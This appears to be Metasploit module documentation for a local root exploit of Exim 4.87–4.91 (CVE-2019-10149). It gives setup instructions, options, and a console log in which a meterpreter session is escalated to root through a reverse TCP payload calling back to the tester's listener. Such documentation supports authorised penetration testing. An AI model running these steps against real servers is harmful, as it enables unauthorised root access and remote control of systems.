# Vulnerable Application

Exim 4.87 - 4.91 Local Privilege Escalation

This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149). 

Both meterpreter shell and classic shell are supported. The exploit will upload the specified `payload`, set the suid bit, and execute it to create a new root session. In order for the new session to be a root one, both `PrependSetuid` and `PrependSetgid` must be set to true (which is the default configuration for the exploit), and the `WritableDir` must be mounted without `nosuid`.

# Creating A Testing Environment

You basically just need to have a exim (between 4.87 and 4.91 inclusive) running and listening on a port (port 25 by default).
For my tests, I used a VM with Ubuntu 18.04 LTS and exim 4.89 (I tested all the versions from 4.87 to 4.91). The exim source code can be downloaded from the official website (all the old versions can be found).
You can also use this good Docker image which sets up a container with a vulnerable exim version running (https://github.com/dhn/exploits/tree/master/CVE-2019-10149).
Be careful if you use the exim package from the official repo of your Linux distribution, even if the version is between 4.87 and 4.91, it may still be patched against the vulnerability (it is the case on Ubuntu at least).

Before using the exploit, make sure exim is actually listening on a port (it may sound stupid, but I struggled a bit when creating a testing environment). However, you should not have any problem if you use the Docker image linked above.

# Verification Steps

1. `use exploit/linux/local/exim4_deliver_message_priv_esc`
2. `set SESSION [session]`
3. `set PAYLOAD [payload]`
4. `set LHOST [lhost]`
5. `set LPORT [lport]`
6. `exploit`

# Options

## PAYLOAD

Set this option to choose which type of root session you want to create.

## EXIMPORT

The port that exim is listening to. On most cases it will be port 25 (which is the default).

## ForceExploit

Force exploit even if the current session is root.
    
## SendExpectTimeout

Timeout per send/expect when communicating with exim.

## WritableDir

A directory where we can write files (default is /tmp).


# Scenarios

## Privilege escalation starting with a meterpreter shell

```
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > 
Background session 1? [y/N]  
msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc 
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost 192.168.0.50
lhost => 192.168.0.50
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lport 13371
lport => 13371
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set EXIMPATH /usr/exim/bin/exim
EXIMPATH => /usr/exim/bin/exim
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > check
[*] The target appears to be vulnerable.
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > exploit

[*] Started reverse TCP handler on 192.168.0.50:13371 
[*] Payload sent, wait a few seconds...
[*] Sending stage (985320 bytes) to 192.168.0.80
[*] Meterpreter session 2 opened (192.168.0.50:13371 -> 192.168.0.80:45562) at 2019-07-07 23:46:37 +0100
[+] Deleted /tmp/eMhzFtUYGQ
[+] Check session 2, you should have a root shell!

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.80
OS           : Ubuntu 18.04 (Linux 4.18.0-25-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
```
